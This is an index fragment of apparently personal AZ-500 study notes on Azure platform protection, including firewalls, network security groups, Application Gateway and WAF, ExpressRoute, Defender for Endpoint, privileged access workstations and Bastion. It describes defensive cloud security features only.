                            You can monitor Azure Firewall using firewall logs. You can also use activity logs to audit operations on Azure Firewall resources. You can access some of these logs through the portal. Logs can be sent to Azure Monitor logs, Storage, and Event Hubs and analyzed in Azure Monitor logs or by different tools such as Excel and Power BI. Metrics are lightweight and can support near real-time scenarios making them useful for alerting and fast issue detection.

                            Threat intelligence-based filtering can be enabled for your firewall to alert and deny traffic from/to known malicious IP addresses and domains. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed. Intelligent Security Graph powers Microsoft threat intelligence and is used by multiple services including Microsoft Defender for Cloud. If you've enabled threat intelligence-based filtering, the associated rules are processed before any of the NAT rules, network rules, or application rules. You can choose to just log an alert when a rule is triggered, or you can choose alert and deny mode. By default, threat intelligence-based filtering is enabled in alert mode.

                            Rule processing logic: You can configure NAT rules, network rules, and applications rules on Azure Firewall. Rule collections are processed according to the rule type in priority order, lower numbers to higher numbers from 100 to 65,000. A rule collection name can have only letters, numbers, underscores, periods, or hyphens. It must begin with a letter or number, and end with a letter, number or underscore. The maximum name length is 80 characters.

                            Service tags represent a group of IP address prefixes to help minimize complexity for security rule creation. Microsoft manages the address prefixes encompassed by the service tag, and automatically updates the service tag as addresses change. Azure Firewall service tags can be used in the network rules destination field. You can use them in place of specific IP addresses.

                            Remote work support - Employees aren't protected by the layered security policies associated with on-premises services while working from home. Virtual Desktop Infrastructure (VDI) deployments on Azure can help organizations rapidly respond to this changing environment. However, you need a way to protect inbound/outbound Internet access to and from these VDI deployments. You can use Azure Firewall DNAT rules along with its threat intelligence-based filtering capabilities to protect your VDI deployments. Azure Virtual Desktop is a comprehensive desktop and app virtualization service running in Azure. It\u2019s the only virtual desktop infrastructure (VDI) that delivers simplified management, multi-session Windows 10, optimizations for Microsoft 365 ProPlus, and support for Remote Desktop Services (RDS) environments.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#14-configure-vpn-forced-tunneling","title":"1.4. Configure VPN forced tunneling","text":"

                            You configure forced tunneling in Azure via virtual network User Defined Routes (UDR). Redirecting traffic to an on-premises site is expressed as a default route to the Azure VPN gateway. This example uses UDRs to create a routing table to first add a default route and then associate the routing table with your virtual network subnets to enable forced tunneling on those subnets.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#15-create-user-defined-routes-and-network-virtual-appliances","title":"1.5. Create User Defined Routes and Network Virtual Appliances","text":"

                            A User Defined Routes (UDR) is a custom route in Azure that overrides Azure's default system routes or adds routes to a subnet's route table. In Azure, you create a route table and then associate that route table with zero or more virtual network subnets.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#2-network-security","title":"2. Network security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#21-network-security-groups-nsg","title":"2.1. Network Security Groups (NSG)","text":"

                            Network traffic can be filtered to and from Azure resources in an Azure virtual network with a\u00a0network security group. A network security group contains security rules that allow or deny inbound network traffic to, or outbound network traffic from, several types of Azure resources. For each rule, you can specify source and destination, port, and protocol.

                            NSGs control inbound and outbound traffic passing through a network adapter (in the Resource Manager deployment model), a VM (in the classic deployment model), or a subnet (in both deployment models).

                            Network Security Group rules

                            • Name. This is a unique identifier for the rule.
                            • Direction. This specifies whether the traffic is inbound or outbound.
                            • Priority. If multiple rules match the traffic, rules with a higher priority apply.
                            • Access. This specifies whether the traffic is allowed or denied.
                            • Source IP address prefix. This prefix identifies where the traffic originated from. It can be based on a single IP address; a range of IP addresses in Classless Interdomain Routing (CIDR) notation; or the asterisk (*), which is a wildcard that matches all possible IP addresses.
                            • Source port range. This specifies source ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
                            • Destination IP address prefix. This identifies the traffic destination based on a single IP address, a range of IP addresses in CIDR notation, or the asterisk (*) to match all possible IP addresses.
                            • Destination port range. This specifies destination ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
                            • Protocol. This specifies a protocol that matches the rule. It can be UDP, TCP, or the asterisk (*).

                            Predefined default rules exist for inbound and outbound traffic. You can\u2019t delete these rules, but you can override them, because they have the lowest priority.

                            The default rules allow all inbound and outbound traffic within a virtual network, allow outbound traffic towards the internet, and allow inbound traffic to an Azure load balancer.

                            When you create a custom rule, you can use default tags in the source and destination IP address prefixes to specify predefined categories of IP addresses. These default tags are:

                            • Internet. This tag represents internet IP addresses.
                            • Virtual_network. This tag identifies all IP addresses that the IP range for the virtual network defines. It also includes IP address ranges from on-premises networks when they are defined as local network to virtual network.
                            • Azure_loadbalancer. This tag specifies the default Azure load balancer destination.

                            You can design NSGs to isolate virtual networks in security zones, like the model used by on-premises infrastructure does. You can apply NSGs to subnets, which allows you to create protected screened subnets, or DMZs, that can restrict traffic flow to all the machines residing within that subnet. With the classic deployment model, you can also assign NSGs to individual computers to control traffic that is both destined for and leaving the VM. With the Resource Manager deployment model, you can assign NSGs to a network adapter so that NSG rules control only the traffic that flows through that network adapter. If the VM has multiple network adapters, NSG rules won\u2019t automatically be applied to traffic that is designated for other network adapters.

                            Network Security Group limitations

                            When implementing NSGs, these are the limits to keep in mind:

                            • By default, you can create 100 NSGs per region per subscription. You can raise this limit to 400 by contacting Azure support.
                            • You can apply only one NSG to a VM, subnet, or network adapter.
                            • By default, you can have up to 200 rules in a single NSG. You can raise this limit to 500 by contacting Azure support.
                            • You can apply an NSG to multiple resources.

                            An individual subnet can have zero, or one, associated NSG. An individual network interface can also have zero, or one, associated NSG. So, you can effectively have dual traffic restriction for a virtual machine by associating an NSG first to a subnet, and then another NSG to the VM's network interface.

                            Consider a simple example with one virtual machine as follows:

                            • The virtual machine is placed inside the Contoso Subnet.
                            • Contoso Subnet is associated with Subnet NSG.
                            • The VM network interface is additionally associated with VM NSG.

                            In this example, for inbound traffic, the Subnet NSG is evaluated first. Any traffic allowed through Subnet NSG is then evaluated by VM NSG. The reverse is applicable for outbound traffic, with VM NSG being evaluated first. Any traffic allowed through VM NSG is then evaluated by Subnet NSG.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#22-application-security-groups","title":"2.2. Application Security Groups","text":"

                            In this topic we look at Application Security Groups (ASGs), which are built on network security groups. ASGs enable you to configure network security as a natural extension of an application's structure. You then can group VMs and define network security policies based on those groups.

                            The rules that specify an ASG as the source or destination are only applied to the network interfaces that are members of the ASG. If the network interface is not a member of an ASG, the rule is not applied to the network interface even though the network security group is associated to the subnet.

                            Application security groups have the following constraints

                            • There are limits to the number of ASGs you can have in a subscription, in addition to other limits related to ASGs.
                            • You can specify one ASG as the source and destination in a security rule. You cannot specify multiple ASGs in the source or destination.
                            • All network interfaces assigned to an ASG must exist in the same virtual network that the first network interface assigned to the ASG is in. For example, if the first network interface assigned to an ASG named AsgWeb is in the virtual network named VNet1, then all subsequent network interfaces assigned to ASGWeb must exist in VNet1. You cannot add network interfaces from different virtual networks to the same ASG.
                            • If you specify an ASG as the source and destination in a security rule, the network interfaces in both ASGs must exist in the same virtual network. For example, if AsgLogic contained network interfaces from VNet1, and AsgDb contained network interfaces from VNet2, you could not assign AsgLogic as the source and AsgDb as the destination in a rule. All network interfaces for both the source and destination ASGs need to exist in the same virtual network.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#23-service-endpoints","title":"2.3. Service Endpoints","text":"

                            A virtual network service endpoint provides the identity of your virtual network to the Azure service. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources.

                            Today, Azure service traffic from a virtual network uses public IP addresses as source IP addresses. With service endpoints, service traffic switches to use virtual network private addresses as the source IP addresses when accessing the Azure service from a virtual network. This switch allows you to access the services without the need for reserved, public IP addresses used in IP firewalls.

                            Why use a service endpoint?

                            • Improved security for your Azure service resources. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources. This provides improved security by fully removing public Internet access to resources, and allowing traffic only from your virtual network.
                            • Optimal routing for Azure service traffic from your virtual network. Today, any routes in your virtual network that force Internet traffic to your premises and/or virtual appliances, known as forced-tunneling, also force Azure service traffic to take the same route as the Internet traffic. Service endpoints provide optimal routing for Azure traffic.
                            • Endpoints always take service traffic directly from your virtual network to the service on the Microsoft Azure backbone network. Keeping traffic on the Azure backbone network allows you to continue auditing and monitoring outbound Internet traffic from your virtual networks, through forced-tunneling, without impacting service traffic.
                            • Simple to set up with less management overhead. You no longer need reserved, public IP addresses in your virtual networks to secure Azure resources through IP firewall. There are no NAT or gateway devices required to set up the service endpoints. Service endpoints are configured through a simple click on a subnet. There is no additional overhead to maintaining the endpoints.

                            Scenarios

                            • Peered, connected, or multiple virtual networks: To secure Azure services to multiple subnets within a virtual network or across multiple virtual networks, you can enable service endpoints on each of the subnets independently, and secure Azure service resources to all of the subnets.
                            • Filtering outbound traffic from a virtual network to Azure services: If you want to inspect or filter the traffic sent to an Azure service from a virtual network, you can deploy a network virtual appliance within the virtual network. You can then apply service endpoints to the subnet where the network virtual appliance is deployed, and secure Azure service resources only to this subnet. This scenario might be helpful if you want use network virtual appliance filtering to restrict Azure service access from your virtual network only to specific Azure resources.
                            • Securing Azure resources to services deployed directly into virtual networks: You can directly deploy various Azure services into specific subnets in a virtual network. You can secure Azure service resources to managed service subnets by setting up a service endpoint on the managed service subnet.
                            • Disk traffic from an Azure virtual machine: Virtual Machine Disk traffic for managed and unmanaged disks isn't affected by service endpoints routing changes for Azure Storage. This traffic includes diskIO as well as mount and unmount. You can limit REST access to page blobs to select networks through service endpoints and Azure Storage network rules.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#24-private-links","title":"2.4. Private links","text":"

                            Azure Private Link works on an approval call flow model wherein the Private Link service consumer can request a connection to the service provider for consuming the service. The service provider can then decide whether to allow the consumer to connect or not. Azure Private Link enables the service providers to manage the private endpoint connection on their resources

                            There are two connection approval methods that a Private Link service consumer can choose from:

                            • Automatic: If the service consumer has RBAC permissions on the service provider resource, the consumer can choose the automatic approval method. In this case, when the request reaches the service provider resource, no action is required from the service provider and the connection is automatically approved.
                            • Manual: On the contrary, if the service consumer doesn\u2019t have RBAC permissions on the service provider resource, the consumer can choose the manual approval method. In this case, the connection request appears on the service resources as Pending. The service provider has to manually approve the request before connections can be established. In manual cases, service consumer can also specify a message with the request to provide more context to the service provider.

                            he service provider has following options to choose from for all Private Endpoint connections:

                            • Approved
                            • Reject
                            • Remove

                            Portal is the preferred method for managing private endpoint connections on Azure PaaS resources.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#25-azure-application-gateway","title":"2.5. Azure application gateway","text":"

                            Azure Application Gateway is a web traffic load balancer that enables you to manage traffic to your web applications. Traditional load balancers operate at the transport layer (OSI layer 4 - TCP and UDP) and route traffic based on the source IP address and port to a destination IP address and port.

                            Application Gateway can make routing decisions based on additional attributes of an HTTP request, for example, URI path or host headers. \u00a0For example, you can route traffic based on the incoming URL. So if /images are in the incoming URL, you can route traffic to a specific set of servers (known as a pool) configured for images. If /video is in the URL, that traffic is routed to another pool that's optimized for videos. This type of routing is known as application layer (OSI layer 7) load balancing.

                            Application Gateway includes the following features:

                            • Secure Sockets Layer (SSL/TLS) termination\u00a0- Application gateway supports SSL/TLS termination at the gateway, after which traffic typically flows unencrypted to the backend servers. This feature allows web servers to be unburdened from costly encryption and decryption overhead.
                            • Autoscaling\u00a0- Application Gateway Standard_v2 supports autoscaling and can scale up or down based on changing traffic load patterns. Autoscaling also removes the requirement to choose a deployment size or instance count during provisioning.
                            • Zone redundancy\u00a0- A Standard_v2 Application Gateway can span multiple Availability Zones, offering better fault resiliency and removing the need to provision separate Application Gateways in each zone.
                            • Static VIP\u00a0- The application gateway Standard_v2 SKU supports static VIP type exclusively. This ensures that the VIP associated with application gateway doesn't change even over the lifetime of the Application Gateway.
                            • Web Application Firewall\u00a0- Web Application Firewall (WAF) is a service that provides centralized protection of your web applications from common exploits and vulnerabilities. WAF is based on rules from the OWASP (Open Web Application Security Project) core rule sets 3.1 (WAF_v2 only), 3.0, and 2.2.9.
                            • Ingress Controller for AKS\u00a0- Application Gateway Ingress Controller (AGIC) allows you to use Application Gateway as the ingress for an Azure Kubernetes Service (AKS) cluster.
                            • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to back-end server pools based on URL Paths of the request. One of the scenarios is to route requests for different content types to different pool.
                            • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same application gateway instance. This feature allows you to configure a more efficient topology for your deployments by adding up to 100 web sites to one Application Gateway (for optimal performance).
                            • Redirection\u00a0- A common scenario for many web applications is to support automatic HTTP to HTTPS redirection to ensure all communication between an application and its users occurs over an encrypted path.
                            • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same server.
                            • Websocket and HTTP/2 traffic\u00a0- Application Gateway provides native support for the WebSocket and HTTP/2 protocols. There's no user-configurable setting to selectively enable or disable WebSocket support.
                            • Connection draining\u00a0- Connection draining helps you achieve graceful removal of backend pool members during planned service updates.
                            • Custom error pages\u00a0- Application Gateway allows you to create custom error pages instead of displaying default error pages. You can use your own branding and layout using a custom error page.
                            • Rewrite HTTP headers\u00a0- HTTP headers allow the client and server to pass additional information with the request or the response.
                            • Sizing\u00a0- Application Gateway Standard_v2 can be configured for autoscaling or fixed size deployments. This SKU doesn't offer different instance sizes.

                            New Application Gateway v1 SKU deployments can take up to 20 minutes to provision. Changes to instance size or count aren't disruptive, and the gateway remains active during this time.

                            Most deployments that use the v2 SKU take around 6 minutes to provision. However it can take longer depending on the type of deployment. For example, deployments across multiple Availability Zones with many instances can take more than 6 minutes.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#26-web-application-firewall","title":"2.6. Web Application Firewall","text":"

                            Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. Web applications are increasingly targeted by malicious attacks that exploit commonly known vulnerabilities. SQL injection and cross-site scripting are among the most common attacks.

                            WAF can be deployed with Azure Application Gateway, Azure Front Door, and Azure Content Delivery Network (CDN) service from Microsoft. WAF on Azure CDN is currently under public preview. WAF has features that are customized for each specific service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#27-azure-front-door","title":"2.7. Azure Front Door","text":"

                            Azure Front Door enables you to define, manage, and monitor the global routing for your web traffic by optimizing for best performance and instant global failover for high availability. With Front Door, you can transform your global (multi-region) consumer and enterprise applications into robust, high-performance personalized modern applications, APIs, and content that reaches a global audience with Azure.

                            Front Door works at Layer 7 or HTTP/HTTPS layer and uses\u00a0split TCP-based anycast protocol.

                            The following features are included with Front Door:

                            • Accelerate application performance\u00a0- Using split TCP-based anycast protocol, Front Door ensures that your end users promptly connect to the nearest Front Door POP (Point of Presence).
                            • Increase application availability with smart health probes\u00a0- Front Door delivers high availability for your critical applications using its smart health probes, monitoring your backends for both latency and availability and providing instant automatic failover when a backend goes down.
                            • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to backend pools based on URL paths of the request. One of the scenarios is to route requests for different content types to different backend pools.
                            • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same Front Door configuration.
                            • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same application backend.
                            • TLS termination\u00a0- Front Door supports TLS termination at the edge that is, individual users can set up a TLS connection with Front Door environments instead of establishing it over long haul connections with the application backend.
                            • Custom domains and certificate management\u00a0- When you use Front Door to deliver content, a custom domain is necessary if you would like your own domain name to be visible in your Front Door URL.
                            • Application layer security\u00a0- Azure Front Door allows you to author custom Web Application Firewall (WAF) rules for access control to protect your HTTP/HTTPS workload from exploitation based on client IP addresses, country code, and http parameters.
                            • URL redirection\u00a0- With the strong industry push on supporting only secure communication, web applications are expected to automatically redirect any HTTP traffic to HTTPS.
                            • URL rewrite\u00a0- Front Door supports URL rewrite by allowing you to configure an optional Custom Forwarding Path to use when constructing the request to forward to the backend.
                            • Protocol support - IPv6 and HTTP/2 traffic\u00a0- Azure Front Door natively supports end-to-end IPv6 connectivity and HTTP/2 protocol.

                            As mentioned above, routing to the Azure Front Door environments leverages Anycast for both DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) traffic, so user traffic will go to the closest environment in terms of network topology (fewest hops). This architecture typically offers better round-trip times for end users (maximizing the benefits of Split TCP). Front Door organizes its environments into primary and fallback \"rings\". The outer ring has environments that are closer to users, offering lower latencies. The inner ring has environments that can handle the failover for the outer ring environment in case an issue happens. The outer ring is the preferred target for all traffic, but the inner ring is necessary to handle traffic overflow from the outer ring. In terms of VIPs (Virtual Internet Protocol addresses), each frontend host, or domain served by Front Door is assigned a primary VIP, which is announced by environments in both the inner and outer ring, as well as a fallback VIP, which is only announced by environments in the inner ring.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#28-expressroute","title":"2.8. ExpressRoute","text":"

                            ExpressRoute\u00a0is a direct, private connection from your WAN (not over the public Internet) to Microsoft Services, including Azure. Site-to-Site VPN traffic travels encrypted over the public Internet. Being able to configure Site-to-Site VPN and ExpressRoute connections for the same virtual network has several advantages.

                            You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute, or use Site-to-Site VPNs to connect to sites that are not part of your network, but that are connected through ExpressRoute. Notice that this configuration requires two virtual network gateways for the same virtual network, one using the gateway type 'Vpn', and the other using the gateway type 'ExpressRoute'.

                            IPsec over ExpressRoute for Virtual WAN

                            Azure Virtual WAN uses an Internet Protocol Security (IPsec) Internet Key Exchange (IKE) VPN connection from your on-premises network to Azure over the private peering of an Azure ExpressRoute circuit. This technique can provide an encrypted transit between the on-premises networks and Azure virtual networks over ExpressRoute, without going over the public internet or using public IP addresses. The following diagram shows an example of VPN connectivity over ExpressRoute private peering.

                            An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths. An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths.

                            Point-to-point encryption by MACsec -. MACsec is an IEEE standard. It encrypts data at the Media Access control (MAC) level or Network Layer 2. You can use MACsec to encrypt the physical links between your network devices and Microsoft's network devices when you connect to Microsoft via ExpressRoute Direct. MACsec is disabled on ExpressRoute Direct ports by default. You bring your own MACsec key for encryption and store it in Azure Key Vault. You decide when to rotate the key.

                            End-to-end encryption by IPsec and MACsec. - IPsec is an IETF standard. It encrypts data at the Internet Protocol (IP) level or Network Layer 3. You can use IPsec to encrypt an end-to-end connection between your on-premises network and your virtual network (VNET) on Azure. MACsec secures the physical connections between you and Microsoft. IPsec secures the end-to-end connection between you and your virtual networks on Azure. You can enable them independently.

                            ExpressRoute Direct gives you the ability to connect directly into Microsoft\u2019s global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100 Gbps or 10 Gbps connectivity, which supports Active/Active connectivity at scale

                            Key features that ExpressRoute Direct provides include, but aren't limited to:

                            • Massive Data Ingestion into services like Storage and Cosmos DB
                            • Physical isolation for industries that are regulated and require dedicated and isolated connectivity like: Banking, Government, and Retail
                            • Granular control of circuit distribution based on business unit

                            ExpressRoute Direct supports massive data ingestion scenarios into Azure storage and other big data services. ExpressRoute circuits on 100 Gbps ExpressRoute Direct now also support 40 Gbps and 100 Gbps circuit SKUs. The physical port pairs are 100 or 10 Gbps only and can have multiple virtual circuits.

                            ExpressRoute Direct supports both QinQ and Dot1Q VLAN tagging.

                            • QinQ VLAN Tagging\u00a0allows for isolated routing domains on a per ExpressRoute circuit basis. Azure dynamically allocates an S-Tag at circuit creation and cannot be changed. Each peering on the circuit (Private and Microsoft) will utilize a unique C-Tag as the VLAN. The C-Tag is not required to be unique across circuits on the ExpressRoute Direct ports.
                            • Dot1Q VLAN Tagging\u00a0allows for a single tagged VLAN on a per ExpressRoute Direct port pair basis. A C-Tag used on a peering must be unique across all circuits and peerings on the ExpressRoute Direct port pair.

                            ExpressRoute Direct provides the same enterprise-grade SLA with Active/Active redundant connections into the Microsoft Global Network. ExpressRoute infrastructure is redundant and connectivity into the Microsoft Global Network is redundant and diverse and scales accordingly with customer requirements.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#3-host-security","title":"3. Host security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#31-endpoint-protection","title":"3.1. Endpoint protection","text":"

                            Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

                            The capabilities on non-Windows platforms may be different from the ones for Windows.

                            Defender for Endpoint uses the following combination of technology built into Windows 10 and Microsoft's robust cloud service:

                            • Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral signals from the operating system and send this sensor data to your private, isolated cloud instance of Microsoft Defender for Endpoint.
                            • Cloud security analytics: Leveraging big data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.
                            • Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures and generate alerts when they are observed in collected sensor data.

                            Some features of Microsoft Defender for Endpoint:

                            Core Defender Vulnerability Management - Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.

                            Attack surface reduction - The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation. This set of capabilities also includes network protection and web protection, which regulate access to malicious IP addresses, domains, and URLs.

                            Next-generation protection - To further reinforce the security perimeter of your network, Microsoft Defender for Endpoint uses next-generation protection designed to catch all types of emerging threats.

                            Endpoint detection and response - Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. Advanced hunting provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.

                            Automated investigation and remediation - In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

                            Microsoft Secure Score for Devices - Defender for Endpoint includes Microsoft Secure Score for Devices to help you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.

                            Microsoft Threat Experts - Microsoft Defender for Endpoint's new managed threat hunting service provides proactive hunting, prioritization, and additional context and insights that further empower Security operation centers (SOCs) to identify and respond to threats quickly and accurately.

                            Defender for Endpoint customers need to apply for the Microsoft Threat Experts managed threat hunting service to get proactive Targeted Attack Notifications and to collaborate with experts on demand.

                            Centralized configuration and administration, APIs - Integrate Microsoft Defender for Endpoint into your existing workflows.

                            Integration with Microsoft solutions - Defender for Endpoint directly integrates with various Microsoft solutions, including:

                            • Microsoft Defender for Cloud
                            • Microsoft Sentinel
                            • Intune
                            • Microsoft Defender for Cloud Apps
                            • Microsoft Defender for Identity
                            • Microsoft Defender for Office
                            • Skype for Business

                            Microsoft 365 Defender - With Microsoft 365 Defender, Defender for Endpoint, and various Microsoft security solutions, form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attack

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#32-privileged-access-device","title":"3.2. Privileged Access Device","text":"

                            Zero Trust, means that you don't purchase from generic retailers but only supply hardware from an authorized OEM that support Autopilot.

                            For this solution, root of trust will be deployed using Windows Autopilot technology with hardware that meets the modern technical requirements. To secure a workstation, Autopilot lets you leverage Microsoft OEM-optimized Windows 10 devices. These devices come in a known good state from the manufacturer. Instead of reimaging a potentially insecure device, Autopilot can transform a Windows 10 device into a \u201cbusiness-ready\u201d state. It applies settings and policies, installs apps, and even changes the edition of Windows 10.

                            To have a secured workstation you need to make sure the following security technologies are included on the device:

                            • Trusted Platform Module (TPM) 2.0
                            • BitLocker Drive Encryption
                            • UEFI Secure Boot
                            • Drivers and Firmware Distributed through Windows Update
                            • Virtualization and HVCI Enabled
                            • Drivers and Apps HVCI-Ready
                            • Windows Hello
                            • DMA I/O Protection
                            • System Guard
                            • Modern Standby

                            Levels of device security

                            Device Type Common usage scenario Permitted activities Security guidance Enterprise Device Home users, small business users, general purpose developers, and enterprise Run any application, browse any website Anti-malware and virus protection and policy based security posture for the enterprise. Specialized Device Specialized or secure enterprise users Run approved applications, but cannot install apps. Email and web browsing allowed. No admin controls No self administration of device, no application installation, policy based security, and endpoint management Privileged Device Extremely sensitive roles IT Operations No local admins, no productivity tools, locked down browsing. PAW device

                            This chart shows the level of device security controls based on how the device will be used.

                            A secure workstation requires it be part of an end-to-end approach including device security, account security, and security policies applied to the device at all times. Here are some common security measures you should consider implementing based on the users' needs.

                            Security Control Enterprise Device Specialized Device Privileged Device Microsoft Endpoint Manager (MEM) managed Yes Yes Yes Deny BYOD Device enrollment No Yes Yes MEM security baseline applied Yes Yes Yes Microsoft Defender for Endpoint Yes Yes Yes Join personal device via Autopilot Yes Yes No URLs restricted to approved list Allow Most Allow Most Deny Default Removal of admin rights Yes Yes Application execution control (AppLocker) Audit -> Enforced Yes Applications installed only by MEM Yes Yes","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#33-privileged-access-workstations-paw-workstations","title":"3.3. Privileged Access Workstations (PAW workstations)","text":"

                            PAW is a hardened and locked down workstation designed to provide high security assurances for sensitive accounts and tasks. PAWs are recommended for administration of identity systems, cloud services, and private cloud fabric as well as sensitive business functions. In order to provide the greatest security, PAWs should always run the most up-to-date and secure operating system available: Microsoft strongly recommends Windows 10 Enterprise, which includes several additional security features not available in other editions (in particular, Credential Guard and Device Guard).

                            • Internet attacks\u00a0- Isolating the PAW from the open internet is a key element to ensuring the PAW is not compromised.
                            • Usability risk\u00a0- If a PAW is too difficult to use for daily tasks, administrators will be motivated to create workarounds to make their jobs easier.
                            • Environment risks\u00a0- Minimizing the use of management tools and accounts that have access to the PAWs to secure and monitor these specialized workstations.
                            • Supply chain tampering\u00a0- Taking a few key actions can mitigate critical attack vectors that are readily available to attackers. This includes validating the integrity of all installation media (Clean Source Principle) and using a trusted and reputable supplier for hardware and software.
                            • Physical attacks\u00a0- Because PAWs can be physically mobile and used outside of physically secure facilities, they must be protected against attacks that leverage unauthorized physical access to the computer.

                            This methodology is appropriate for accounts with access to high value assets:

                            • Administrative Privileges\u00a0- PAWs provide increased security for high impact IT administrative roles and tasks. This architecture can be applied to administration of many types of systems including Active Directory Domains and Forests, Microsoft Entra tenants, Microsoft 365 tenants, Process Control Networks (PCN), Supervisory Control and Data Acquisition (SCADA) systems, Automated Teller Machines (ATMs), and Point of Sale (PoS) devices.
                            • High Sensitivity Information workers\u00a0- The approach used in a PAW can also provide protection for highly sensitive information worker tasks and personnel such as those involving pre-announcement Merger and Acquisition activity, pre-release financial reports, organizational social media presence, executive communications, unpatented trade secrets, sensitive research, or other proprietary or sensitive data. This guidance does not discuss the configuration of these information worker scenarios in depth or include this scenario in the technical instructions.

                            Administrative \"Jump Box\" architectures set up a small number administrative console servers and restrict personnel to using them for administrative tasks. This is typically based on remote desktop services, a 3rd-party presentation virtualization solution, or a Virtual Desktop Infrastructure (VDI) technology.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#34-virtual-machine-templates","title":"3.4. Virtual Machine templates","text":"

                            Here are some additional terms to know when using Resource Manager:

                            • Resource provider. A service that supplies Azure resources. For example, a common resource provider is Microsoft.Compute, which supplies the VM resource. Microsoft.Storage is another common resource provider.
                            • Resource Manager template. A JSON file that defines one or more resources to deploy to a resource group or subscription. You can use the template to consistently and repeatedly deploy the resources.
                            • Declarative syntax. Syntax that lets you state, \"Here\u2019s what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.

                            When you deploy a template, Resource Manager converts the template into REST API operations.

                            Here two different deployment schemas with same result:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#35-remote-access-management-rdp-ssh-and-azure-bastion","title":"3.5. Remote Access Management: RDP, ssh, and Azure Bastion","text":"

                            This topic explains how to connect to and sign into the virtual machines (VMs) you created on Azure. Once you've successfully connected, you can work with the VM as if you were locally logged on to its host server.

                            Connect to a Windows VM - With rdp, with ssh or with Azure Bastion Service. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. Bastion provides secure RDP and SSH connectivity to all the VMs in the virtual network in which it is provisioned. Using Azure Bastion protects your virtual machines from exposing RDP/SSH ports to the outside world, while still providing secure access using RDP/SSH. With Azure Bastion, you connect to the virtual machine directly from the Azure portal.

                            Benefits of Bastion

                            You can deploy bastion hosts (also known as jump-servers) at the public side of your perimeter network. Bastion host servers are designed and configured to withstand attacks. Bastion servers also provide RDP and SSH connectivity to the workloads sitting behind the bastion, as well as further inside the network.

